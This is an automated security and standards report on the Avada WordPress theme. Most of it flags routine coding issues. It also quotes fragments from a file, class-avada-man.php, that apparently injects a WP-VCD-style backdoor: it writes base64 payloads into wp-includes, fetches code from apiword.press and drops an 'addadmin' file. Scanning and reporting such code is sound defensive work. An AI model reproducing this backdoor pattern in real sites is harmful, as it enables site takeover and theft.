Validation results

Avada

WordPress 4.8 theme
Critical alerts
  1. WPScan Vulnerability Database : This theme is affected by the vulnerability "Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF".
    More on the WordPress Vulnerability Scanner site : https://wpvulndb.com/vulnerabilities/8801
  2. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  3. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  4. Security breaches : Use of PHP system calls Found ->exec in file CurlPost.php.
    Line 83: $response = $this->curl->exec($handle);
  5. Security breaches : Modification of PHP server settings Found ini_set in file class-avada-migrate.php.
    Line 119: @ini_set( 'memory_limit', '256M' );
    Found ini_set in file importer.php.
    Line 53: @ini_set( 'max_execution_time', 300 );
    Line 56: @ini_set( 'memory_limit', '512M' );
  6. Security breaches : Use of base64_decode() Found base64_decode in file class-avada-man.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file class-avada-patcher-client.php.
    Line 151: $args['reference'] = base64_decode( $args['reference'] );
    Found base64_decode in file class-avada-patcher-apply-patch.php.
    Line 75: $setting = (array) json_decode( base64_decode( $setting ) );
  7. Security breaches : Use of base64_encode() Found base64_encode in file class-fusion-widget-tweets.php.
     $to_send     = base64_encode( $credentials );
    Found base64_encode in file class-avada-patcher-admin-screen.php.
     return base64_encode( wp_json_encode( $patches ) );
  8. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe height="100%" width="100%" src="https://www.youtube.com/embed/<?php echo $metadata['pyre_youtube_id'][0]; ?> in file custom_functions.php.
    Line 501: <iframe height='100%' width='100%' src='https://www.youtube.com/embed/<?php
  9. Malware : Operations on file system fopen was found in the file class.avadaredux_helpers.php
    Line 657: //$fp = fopen( $file, 'r' );
    fread was found in the file class.avadaredux_helpers.php
    Line 660: //$file_data = fread( $fp, 8192 );
    fclose was found in the file class.avadaredux_helpers.php
    Line 663: //fclose( $fp );
    file_get_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-avada-man.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-avada-migrate.php
    Line 553: $debug_content = file_get_contents( $debug_file_path );
    file_put_contents was found in the file class-avada-migrate.php
    Line 556: file_put_contents( $debug_file_path, $debug_content );
    file_get_contents was found in the file Post.php
    Line 68: return file_get_contents(self::SITE_VERIFY_URL, false, $context);
    fwrite was found in the file SocketPost.php
    Line 104: $this->socket->fwrite($request);
    fclose was found in the file SocketPost.php
    Line 111: $this->socket->fclose();
    fwrite was found in the file Socket.php
    Line 59: * fwrite
    Line 61: * @see http://php.net/fwrite
    Line 66: public function fwrite($string, $length = null)
    Line 68: return fwrite($this->handle, $string, (is_null($length) ? strlen($string) : $lengt
    fclose was found in the file Socket.php
    Line 95: * fclose
    Line 97: * @see http://php.net/fclose
    Line 100: public function fclose()
    Line 102: return fclose($this->handle);
    file_get_contents was found in the file parsers.php
    Line 69: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 273: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    fopen was found in the file parsers.php
    Line 421: $fp = $this->fopen( $file, 'r' );
    Line 647: function fopen( $filename, $mode = 'r' ) {
    Line 650: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 470: $this->fclose($fp);
    Line 665: function fclose( $fp ) {
    Line 668: return fclose( $fp );
    file_get_contents was found in the file importer.php
    Line 232: $theme_options_json = file_get_contents( $theme_options_file );
    Line 258: $widgets_json = file_get_contents( $widgets_json );
    file_get_contents was found in the file class-avada-importer-data.php
    Line 103: $demos = file_get_contents( Avada::$template_dir_path . '/includes/plugins/importer/
    file_get_contents was found in the file avada-functions.php
    Line 1016: $try_file_get_contents = false;
    Line 1042: $try_file_get_contents = true;
    Line 1048: $try_file_get_contents = true;
    Line 1050: if ( $try_file_get_contents ) {
    Line 1051: $body = @file_get_contents( $url );
    fopen was found in the file avada-functions.php
    Line 1075: $fp = fopen( $file_path, 'w' );
    fwrite was found in the file avada-functions.php
    Line 1073: // If the attempt to write to the file failed, then fallback to fwrite.
    Line 1076: $written = fwrite( $fp, $body );
    fclose was found in the file avada-functions.php
    Line 1077: fclose( $fp );
  10. Malware : Network operations curl_init was found in the file Curl.php
    Line 36: * @see http://php.net/curl_init
    Line 42: return curl_init($url);
    curl_exec was found in the file Curl.php
    Line 57: * @see http://php.net/curl_exec
    Line 63: return curl_exec($ch);
    fsockopen was found in the file SocketPost.php
    Line 33: * Sends a POST request to the reCAPTCHA service, but makes use of fsockopen()
    Line 91: if (false === $this->socket->fsockopen('ssl://' . self::RECAPTCHA_HOST, 443, $errno, $errstr, 30)) {
    fsockopen was found in the file Socket.php
    Line 38: * fsockopen
    Line 40: * @see http://php.net/fsockopen
    Line 48: public function fsockopen($hostname, $port = -1, &$errno = 0, &$errstr = '', $timeout = nul
    Line 50: $this->handle = fsockopen($hostname, $port, $errno, $errstr, (is_null($timeout) ? ini_get('
  11. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-avada-avadaredux.php :
    Line 154: add_submenu_page( 'themes.php', __( 'Avada Options have moved!', 'Avada' ),
    File framework.php :
    Line 1344: // wrappers and need to be appened to using add_submenu_page.
    Line 1395: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1453: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1421: $this->page = call_user_func( 'add_menu_page', $this->args['page_title'], $this->args['menu_title'], $this
    File welcome.php :
    Line 197: $page = 'add_management_page';
    File class-avada-layout-bbpress.php :
    Line 38: add_action( 'bbp_template_before_search', array( $this, 'add_search_page_search_form' ) );
    Line 125: public function add_search_page_search_form() {
    File class-avada-admin.php :
    Line 340: $avada_menu_page_creation_method    = 'add_menu_page';
    Line 341: $avada_submenu_page_creation_method = 'add_submenu_page';
  12. Included plugins : Zip file found Plugins are not allowed in themes. The zip files found were fusion-builder.zip, fusion-core.zip.
Warning
  1. core scripts deregistered : Core scripts deregistration Found wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 562: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
    Found wp_deregister_script in class-avada-scripts.php. Themes must not deregister core scripts.
    Line 58: wp_deregister_script( 'novagallery_modernizr' );
    Line 62: wp_deregister_script( 'ccgallery_modernizr' );
    Line 76: wp_deregister_script( 'bootstrap' );
    Line 80: wp_deregister_script( 'cssua' );
    Line 84: wp_deregister_script( 'jquery.easyPieChart' );
    Line 88: wp_deregister_script( 'Froogaloop' );
    Line 92: wp_deregister_script( 'imagesLoaded' );
    Line 96: wp_deregister_script( 'jquery.infinitescroll' );
    Line 100: wp_deregister_script( 'isotope' );
    Line 104: wp_deregister_script( 'jquery.appear' );
    Line 108: wp_deregister_script( 'jquery.touchSwipe' );
    Line 112: wp_deregister_script( 'jquery.carouFredSel' );
    Line 116: wp_deregister_script( 'jquery.countTo' );
    Line 120: wp_deregister_script( 'jquery.countdown' );
    Line 124: wp_deregister_script( 'jquery.cycle' );
    Line 128: wp_deregister_script( 'jquery.easing' );
    Line 132: wp_deregister_script( 'jquery.elasticslider' );
    Line 136: wp_deregister_script( 'jquery.fitvids' );
    Line 140: wp_deregister_script( 'jquery.flexslider' );
    Line 144: wp_deregister_script( 'jquery.fusion_maps' );
    Line 148: wp_deregister_script( 'jquery.hoverflow' );
    Line 152: wp_deregister_script( 'jquery.hoverIntent' );
    Line 156: wp_deregister_script( 'jquery.placeholder' );
    Line 160: wp_deregister_script( 'jquery.toTop' );
    Line 165: wp_deregister_script( 'jquery.waypoints' );
    Line 169: wp_deregister_script( 'modernizr' );
    Line 173: wp_deregister_script( 'jquery.requestAnimationFrame' );
    Line 177: wp_deregister_script( 'jquery.mousewheel' );
    Line 182: wp_deregister_script( 'ilightbox.packed' );
    Line 187: wp_deregister_script( 'avada-lightbox' );
    Line 191: wp_deregister_script( 'avada-header' );
    Line 195: wp_deregister_script( 'avada-select' );
    Line 199: wp_deregister_script( 'avada-parallax' );
    Line 203: wp_deregister_script( 'avada-video-bg' );
    Line 239: wp_deregister_script( 'avada' );
  2. theme tags : Presence of bad theme tags Found wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions. Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is avada.
  4. Text domain : Incorrect use of translation functions.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered for %1s, falling back to using pixels. Saved value "%4$s" and not "%5$s".' in file validation-functions.php.
    Found a translation function that is missing a text-domain. Function _e, with the arguments '&mdash; Select &mdash;' in file class-fusion-widget-menu.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Migration Information' in file class-avada-migrate.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'link' in file class-avada-migrate.php.
    Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.
    Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments in file list-widget.php.
    Found a translation function that has an incorrect number of arguments. Function _n, with the arguments 'View 1 %1$s', 'View All %2$s %3$s', total_events, 'the-events-calendar' in file single-day.php.
    More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are Avada, avadaredux-framework, themecheck, tgmpa, fusion-core, fusion-builder, bbpress, woocommerce, avada, wordpress-importer, envato-market, textdomain, sermon-manager, the-events-calendar, tribe-events-calendar-pro, total_events.
  5. Plugin territory : Plugin territory functionalities The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. PHP short tags : Presence of PHP short tags PHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 765: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))
  7. Hidden admin bar : Hidden admin Bar in CSS Themes should not hide admin bar. Detected in file style.min.css.
  8. Editor style : Presence of editor style No reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  9. I18N implementation : Proper use of _e( Possible variable $link_to_all found in translation function in list-widget.php. Translation function calls should not contain PHP variables.
    Line 56: <a href='<?php esc_attr_e( esc_url( $link_to_all ) ) ?>' rel='bookmark'>
  10. I18N implementation : Proper use of esc_attr_e( Possible variable $link_to_all found in translation function in list-widget.php. Translation function calls should not contain PHP variables.
    Line 56: <a href='<?php esc_attr_e( esc_url( $link_to_all ) ) ?>' rel='bookmark'>
  11. Screenshot : Screenshot file Screenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred. Bad screenshot file extension! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon management Possible Favicon found in class-avada-head.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded links Possible hard-coded links were found in the file class-avada-avadaredux.php.
    Line 817: $correlation_link = '  <span class='avada-hover-description'><a href='https://theme-fusion.com/avada-doc/options/how-options-work/' target='_blan
    Possible hard-coded links were found in the file welcome.php.
    Line 478: <a href='http://docs.avadareduxframework.com/' class='docs button button-primary'>Do
    Line 481: <a href='https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MMFMHW
    Possible hard-coded links were found in the file header_stickybar.tpl.php.
    Line 24: <a href='https://theme-fusion.com/support' target='_blank'><span class='dashicons da
    Possible hard-coded links were found in the file class-fusion-widget-facebook-page.php.
    Line 159: <h4 style='line-height: 1.6em;'><?php _e( 'IMPORTANT: Please create a Facebook App and use its ID for features like sharing.', 'Avada' ); ?> <a href='https://developers.facebook.com/docs/apps/register' target='_blank' rel='no
    Possible hard-coded links were found in the file class-avada-upgrade.php.
    Line 326: <li><strong>REMOVED:</strong> Fixed Mode for iPad is removed as a theme option. Fixed Mode is moved into a free plugin. <a href='https://theme-fusion.com/avada-doc/fixed-mode-for-ipad-portrait/' target='_
    Line 347: You can view all update information here: <a href='http://theme-fusion.com/avada-doc/install-update/important-update-informati
    Line 353: <a href='http://theme-fusion.com/avada-documentation/changelog.txt' class='view-chan
    Possible hard-coded links were found in the file support.php.
    Line 11: <p class='about-description'><?php printf( __( 'Avada comes with 6 months of free support for every license you purchase. Support can be <a %1$s>extended through subscriptions</a> via ThemeForest. All support for Avada is handled through our support center on our company site. To access it, you must first setup an account by <a %2$s>following these steps</a>. Below are all the resources we offer in our support center as well as the Avada Patcher tool that allows you to easily apply available patches to the version of Avada you are using.', 'Avada' ), 'a href='https://help.market.envato.com/hc/en-us/articles/207886473-Extending-and-Renewing-Item-Support' target='_blank'', 'href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' ta
    Line 12: <p><a href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' cl
    Line 44: <a href='https://www.facebook.com/groups/AvadaUsers/' class='button button-large but
    Possible hard-coded links were found in the file class-avada-patcher-admin-screen.php.
    Line 134: <span class='avada-auto-patcher learn-more'><a href='https://theme-fusion.com/avada-doc/avada-patcher/' target='_blank' rel='noo
    Possible hard-coded links were found in the file footer.php.
    Line 98: 'description' => sprintf( esc_html__( 'The entire height of the footer area (widgets + copyright) %1$s View tutorial here %2$s. Set a static height in px to enable sticky footer effect. Set to 0 to disable.', 'Avada' ), '<a href='https://theme-fusion.com/avada-doc/footer-special-effects/' target='_blank'
    Possible hard-coded links were found in the file contact.php.
    Line 75: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the site key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 83: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the secret key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Possible hard-coded links were found in the file class-avada-admin.php.
    Line 430: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 439: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Possible hard-coded links were found in the file class-fusion-builder-migrate.php.
    Line 1117: <p><?php printf( __( 'If you don\'t want your pages converted then please delete the new Avada folder and copy the old Avada folder to your server. If you did not backup your previous Avada theme folder, you can %s.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' target='_bl
    Line 1123: <p><?php printf( __( 'Once reversion is done, you can load a previous version of Avada onto your server. You can download %s here if you do not have a backup of your previous theme.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/'>' . esc_att
    Line 1165: <?php printf( __( 'All needed posts have been reverted to the previous syntax. You can now roll-back to <a href='%s' target='_blank'>Avada 4.0.3</a>.', 'Avada' ), 'https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' ); ?>
    Possible hard-coded links were found in the file multiple-featured-images.php.
    Line 4: Description: Enables multiple featured images for posts and pages. If you like my plugin, feel free to give me reward ;) <a href='http://www.amazon.de/registry/wishlist/16KTW9ZG027C8' title='Amazon Wishlis
    Possible hard-coded links were found in the file avada-functions.php.
    Line 1202: $html .= '<a href='https://theme-fusion.com/avada-doc/sliders/how-to-get-our-demo-sliders/' ti
  3. Optional files : Presence of rtl stylesheet rtl.css This theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.php This theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.php This theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.php This theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.php This theme does not contain optional file tag.php.
  8. Optional files : Presence of term template file taxonomy.php This theme does not contain optional file taxonomy.php.
  9. Optional files : Presence of date/time template file date.php This theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.php This theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.php This theme does not contain optional file image.php.
  12. Use of includes : Use of include or require The theme appears to use include or require : class-fusion-image-resizer.php
    Line 142: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_repeater.php
    Line 421: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_accordion.php
    Line 79: //include_once($this->extension_dir . 'multi-media/inc/class.customizer.php')
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux.php
    Line 85: require_once( dirname( __FILE__ ) . '/avadaredux-framework/avadaredux-frame
    Line 88: require_once( dirname( __FILE__ ) . '/validation-functions.php' );
    Line 90: require_once( dirname( __FILE__ ) . '/class-avada-avadaredux-addons.php' );
    Line 898: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    Line 906: include( dirname( __FILE__ ) . '/assets/style.css' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 410: // 	require_once 'core/dashboard.php';
    Line 414: // 		require_once 'core/newsflash.php';
    Line 1705: require_once 'core/enqueue.php';
    Line 2856: require_once 'core/enqueue.php';
    Line 2914: require_once 'core/panel.php';
    Line 3243: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 750: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 374: require_once 'views/about.php';
    Line 389: require_once 'views/changelog.php';
    Line 404: require_once 'views/extensions.php';
    Line 420: require_once 'views/support.php';
    Line 435: require_once 'views/credits.php';
    Line 450: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux-migration.php
    Line 798: require_once( ABSPATH . 'wp-admin/includes/media.php' );
    Line 799: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 800: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-man.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-patcher-filesystem.php
    Line 80: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-product-registration.php
    Line 180: require_once( Avada::$template_dir_path . '/includes/class-avada-envato-api
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-admin.php
    Line 370: require_once( 'admin-screens/welcome.php' );
    Line 380: require_once( 'admin-screens/support.php' );
    Line 390: require_once( 'admin-screens/install-demos.php' );
    Line 400: require_once( 'admin-screens/fusion-plugins.php' );
    Line 410: require_once( 'admin-screens/system-status.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-megamenu-framework.php
    Line 130: require_once( 'mega-menus.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : fusion-functions.php
    Line 931: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 981: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : importer.php
    Line 27: include 'class-avada-importer-data.php';
    Line 625: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-importer-data.php
    Line 157: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-dynamic-css.php
    Line 128: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-fusion-builder-demos-importer.php
    Line 130: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-contact.php
    Line 100: require_once( get_template_directory() . '/includes/recaptcha/src/autoload.
    Line 102: require_once( get_template_directory() . '/includes/recaptcha/class-avada-r
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : metaboxes.php
    Line 240: include 'options/options_es.php';
    Line 249: include 'options/options_slide.php';
    Line 302: <?php require_once( 'tabs/tab_' . $tab_name . '.php' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : avada-functions.php
    Line 141: include( locate_template( 'templates/rollover.php' ) );
    Line 195: include( locate_template( 'templates/featured-image-first.php' ) );
    Line 610: include( locate_template( 'templates/related-posts.php' ) );
    Line 631: include( locate_template( 'templates/pages-rich-snippets.php' ) );
    Line 702: include( locate_template( 'templates/title-bar.php' ) );
    Line 1023: include_once( wp_normalize_path( ABSPATH . WPINC . '/class-http.php' ) );
    Line 1060: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since ThemeForest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score (ThemeForest requirements).

0
Critical alerts
  1. WPScan Vulnerability Database : This theme is vulnerable to security breach "Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF "
    More on Wordpress Vulnerability Scanner site : https://wpvulndb.com/vulnerabilities/8801
  2. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  3. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  4. Security breaches : Use of PHP system calls Found ->exec in file CurlPost.php.
    Line 83: $response = $this->curl->exec($handle);
  5. Security breaches : Modification of PHP server settings Found ini_set in file class-avada-migrate.php.
    Line 119: @ini_set( 'memory_limit', '256M' );
    Found ini_set in file importer.php.
    Line 53: @ini_set( 'max_execution_time', 300 );
    Line 56: @ini_set( 'memory_limit', '512M' );
  6. Malware : Network operations curl_init was found in the file Curl.php
    Line 36: * @see http://php.net/curl_init
    Line 42: return curl_init($url);
    curl_exec was found in the file Curl.php
    Line 57: * @see http://php.net/curl_exec
    Line 63: return curl_exec($ch);
    fsockopen was found in the file SocketPost.php
    Line 33: * Sends a POST request to the reCAPTCHA service, but makes use of fsockopen()
    Line 91: if (false === $this->socket->fsockopen('ssl://' . self::RECAPTCHA_HOST, 443, $errno, $errstr, 30)) {
    fsockopen was found in the file Socket.php
    Line 38: * fsockopen
    Line 40: * @see http://php.net/fsockopen
    Line 48: public function fsockopen($hostname, $port = -1, &$errno = 0, &$errstr = '', $timeout = nul
    Line 50: $this->handle = fsockopen($hostname, $port, $errno, $errstr, (is_null($timeout) ? ini_get('
  7. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was fusion-builder.zip fusion-core.zip.
Warning
  1. core scripts deregistered : Core scripts deregistration Found wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 562: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
    Found wp_deregister_script in class-avada-scripts.php. Themes must not deregister core scripts.
    Line 58: wp_deregister_script( 'novagallery_modernizr' );
    Line 62: wp_deregister_script( 'ccgallery_modernizr' );
    Line 76: wp_deregister_script( 'bootstrap' );
    Line 80: wp_deregister_script( 'cssua' );
    Line 84: wp_deregister_script( 'jquery.easyPieChart' );
    Line 88: wp_deregister_script( 'Froogaloop' );
    Line 92: wp_deregister_script( 'imagesLoaded' );
    Line 96: wp_deregister_script( 'jquery.infinitescroll' );
    Line 100: wp_deregister_script( 'isotope' );
    Line 104: wp_deregister_script( 'jquery.appear' );
    Line 108: wp_deregister_script( 'jquery.touchSwipe' );
    Line 112: wp_deregister_script( 'jquery.carouFredSel' );
    Line 116: wp_deregister_script( 'jquery.countTo' );
    Line 120: wp_deregister_script( 'jquery.countdown' );
    Line 124: wp_deregister_script( 'jquery.cycle' );
    Line 128: wp_deregister_script( 'jquery.easing' );
    Line 132: wp_deregister_script( 'jquery.elasticslider' );
    Line 136: wp_deregister_script( 'jquery.fitvids' );
    Line 140: wp_deregister_script( 'jquery.flexslider' );
    Line 144: wp_deregister_script( 'jquery.fusion_maps' );
    Line 148: wp_deregister_script( 'jquery.hoverflow' );
    Line 152: wp_deregister_script( 'jquery.hoverIntent' );
    Line 156: wp_deregister_script( 'jquery.placeholder' );
    Line 160: wp_deregister_script( 'jquery.toTop' );
    Line 165: wp_deregister_script( 'jquery.waypoints' );
    Line 169: wp_deregister_script( 'modernizr' );
    Line 173: wp_deregister_script( 'jquery.requestAnimationFrame' );
    Line 177: wp_deregister_script( 'jquery.mousewheel' );
    Line 182: wp_deregister_script( 'ilightbox.packed' );
    Line 187: wp_deregister_script( 'avada-lightbox' );
    Line 191: wp_deregister_script( 'avada-header' );
    Line 195: wp_deregister_script( 'avada-select' );
    Line 199: wp_deregister_script( 'avada-parallax' );
    Line 203: wp_deregister_script( 'avada-video-bg' );
    Line 239: wp_deregister_script( 'avada' );
  2. theme tags : Presence of bad theme tags Found wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions. Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is avada.
  4. Text domain : Incorrect use of translation functions.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered for %1s, falling back to using pixels. Saved value "%4$s" and not "%5$s".' in file validation-functions.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.
    Found a translation function that is missing a text-domain. Function _e, with the arguments '&mdash; Select &mdash;' in file class-fusion-widget-menu.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Migration Information' in file class-avada-migrate.php.
    Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'link' in file class-avada-migrate.php.
    Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.
